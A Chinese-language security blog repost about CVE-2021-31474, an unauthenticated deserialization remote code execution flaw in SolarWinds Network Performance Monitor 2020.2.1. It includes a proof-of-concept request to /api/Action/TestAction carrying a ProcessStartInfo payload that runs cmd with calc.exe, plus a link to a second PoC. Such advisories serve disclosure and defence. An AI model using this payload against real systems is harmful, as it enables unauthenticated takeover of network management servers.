SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

  • A+
所属分类:安全漏洞

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

文章来源:Khan安全攻防实验室

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)


SolarWinds Network Performance Monitor(NPM)是集网络监测、设备性能维护管理、故障监控、网络实时流量监控和历史数据统计、汇总和历史数据分析等功能于一体的网络管理系统。



该漏洞存在于SolarWinds.Serialization库中,由于对用户提供的数据缺乏正确验证,导致不信任数据的反序列化。成功利用此漏洞的攻击者可以在系统上下文中执行任意代码,而无需经过身份验证。


影响范围

SolarWinds Network Performance Monitor 2020.2.1


Poc:


POST  /api/Action/TestAction 


<sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null }" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" /> 2x Base6


Poc2:


https://gist.github.com/testanull/dcb536b409a28d74430a441d53b14456



SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)


SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

本文始发于微信公众号(黑白之道):SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: